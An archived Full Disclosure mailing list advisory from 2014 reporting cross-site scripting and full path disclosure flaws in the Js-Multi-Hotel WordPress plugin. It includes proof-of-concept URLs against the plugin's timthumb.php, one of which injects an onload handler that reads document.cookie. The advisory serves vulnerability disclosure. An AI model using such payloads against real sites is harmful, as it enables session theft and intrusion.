Full Disclosure mailing list archives
XSS and FPD vulnerabilities in Js-Multi-Hotel for WordPress
From: "MustLive" <mustlive () websecurity com ua>
Date: Sat, 29 Mar 2014 16:01:58 +0200
Hello list! These are vulnerabilities in Js-Multi-Hotel plugin for WordPress. ------------------------- Affected products: ------------------------- Vulnerable are Js-Multi-Hotel 2.2.1 and previous versions. ------------------------- Affected vendors: ------------------------- Joomlaskin http://wordpress.org ---------- Details: ---------- Cross-Site Scripting (WASC-08): http://site/wp-content/plugins/js-multihotel/includes/timthumb.php?src=%3C%3Cbody%20onload=alert(document.cookie)%3E Full path disclosure (WASC-13): http://site/wp-content/plugins/js-multihotel/includes/timthumb.php?src=http:// I have disclosed it at my site (http://websecurity.com.ua/7082/). Best wishes & regards, MustLive Administrator of Websecurity web sitehttp://websecurity.com.ua
_______________________________________________ Sent through the Full Disclosure mailing list http://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Current thread:
- XSS and FPD vulnerabilities in Js-Multi-Hotel for WordPress MustLive (Mar 29)